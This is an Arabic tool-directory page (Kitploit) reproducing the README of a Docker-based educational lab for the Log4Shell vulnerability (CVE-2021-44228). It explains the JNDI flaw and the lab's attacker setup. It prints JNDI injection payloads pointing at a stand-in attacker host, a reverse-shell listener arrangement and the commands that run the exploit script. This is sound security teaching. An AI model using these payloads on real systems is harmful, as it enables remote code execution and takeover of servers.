Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/joaovicdev/exploit-cve-2021-44228
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubjoaovicdev/exploit-cve-2021-44228

EXPLOIT-CVE-2021-44228

مختبر تعليمي قائم على Docker يوضح استغلال Log4Shell (CVE-2021-44228) لتنفيذ الأوامر عن بُعد مع تطبيق Java ضعيف وموجه LDAP وسكربت استغلال آلي.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
4منذ 5 أشهرلم تتم المراجعة بعد
مشاركة

CVE-2021-44228 — مختبر Log4Shell (PoC)

إخلاء مسؤولية

أُنشئ هذا المختبر حصريًا للأغراض التعليمية والبحثية في مجال الأمن. يحدث كل حركة المرور داخل شبكة Docker معزولة. لا تستخدم هذه المادة على أنظمة حقيقية أو دون إذن صريح. قد يكون سوء الاستخدام جريمة. استخدمه بمسؤولية.


ما هي CVE-2021-44228؟

Log4Shell هي ثغرة أمنية حرجة (CVSS 10.0) اكتُشفت في ديسمبر 2021 في مكتبة تسجيل الدخول Apache Log4j 2، المستخدمة على نطاق واسع في تطبيقات Java.

كيف تحدث الثغرة

يمتلك Log4j ميزة استيفاء التعبيرات: عند تسجيل رسالة، يقوم بتقييم السلاسل النصية بصيغة ${...}. على سبيل المثال، يتم استبدال ${java:version} بإصدار Java في وقت التشغيل.

تكمن المشكلة في دعم بروتوكول JNDI (Java Naming and Directory Interface). عندما يجد Log4j تعبيرًا مثل:

root@kitploit:~
${jndi:ldap://atacante.com/exploit}

فإنه يوجّه JVM لإجراء استعلام LDAP إلى خادم المهاجم. يستجيب الخادم بمرجع إلى فئة Java عن بُعد — وتقوم JVM بتنزيل هذه الفئة وتنفيذها، مما يؤدي إلى تنفيذ الأوامر عن بُعد (RCE).

ناقل الهجوم بسيط: أي حقل يسجله الخادم (ترويسات HTTP، حقول النماذج، ملفات تعريف الارتباط، إلخ) يمكن أن يكون نقطة دخول لحمولة الهجوم.

الإصدارات المتأثرة

  • Log4j 2.0-beta9 حتى 2.14.1
  • تم إصلاحه في الإصدار 2.15.0 (وبشكل نهائي في 2.17.0)

البيئة القابلة للاستغلال

يحاكي المختبر تطبيق Java حقيقيًا باستخدام الإصدارات القابلة للاستغلال.

المكوّنالإصدارلماذا هو قابل للاستغلال
Apache Log4j2.14.1يقيّم ${jndi:...} دون قيود
JDK1.8.0_181أقدم من التحديث 8u191 الذي يضبط trustURLCodebase=false
Spring Boot2.5.6مجرد إطار عمل ويب؛ الثغرة في Log4j

نقطة النهاية القابلة للاستغلال

root@kitploit:~
GET http://localhost:8080/log

يتم تسجيل الترويسات التالية مباشرة بواسطة Log4j — أي منها يمكن أن يكون ناقل الحقن:

  • X-Api-Version
  • User-Agent
  • X-Auth-Token

بنية المهاجم (حاوية attacker)

الخدمةالمنفذالوظيفة
marshalsec (LDAP)1389يستقبل استعلام JNDI ويعيد التوجيه إلى خادم HTTP
Python HTTP server8888يقدّم Exploit.class إلى JVM الخاص بالضحية
netcat listener9001يستقبل اتصال القشرة العكسية

كيفية استخدام الاستغلال

المتطلبات الأساسية

  • تثبيت Docker و Docker Compose
  • تثبيت Node.js (للاستغلال)

1. تشغيل البيئة الكاملة

root@kitploit:~
docker-compose up --build

انتظر حتى ترى في السجلات:

root@kitploit:~
[*] Waiting for reverse shell on :9001 ...
Started Application in X seconds

2. تشغيل الاستغلال

في طرفية أخرى، شغّل استغلال Node.js:

root@kitploit:~
node exploit/exploit.js

المخرجات المتوقعة:

root@kitploit:~
[*] CVE-2021-44228 — Log4Shell PoC
[*] Target  : http://localhost:8080/log
[*] Header  : X-Api-Version
[*] Payload : ${jndi:ldap://attacker:1389/Exploit}

[+] Response : 200 OK
[+] Body     : logged

[+] Payload delivered — check the attacker nc listener on port 9001

3. التحقق من التنفيذ

لاحظ الطرفية التي يعمل فيها docker-compose. في سجلات الحاوية attacker سترى اتصال القشرة العكسية يصل إلى المنفذ 9001.

لتأكيد touch /tmp/pwned داخل التطبيق القابل للاستغلال:

root@kitploit:~
docker exec -it log4j-cve-2021-44228-vulnerable-app-1 ls /tmp/pwned

وسائط مخصصة (اختيارية)

root@kitploit:~
# node exploit/exploit.js [target] [ldapHost] [ldapPort] [className] [header]
node exploit/exploit.js http://localhost:8080/log attacker 1389 Exploit "User-Agent"

بواسطة Guaxinim | أبحاث الأمن السيبراني

تنزيل الأداة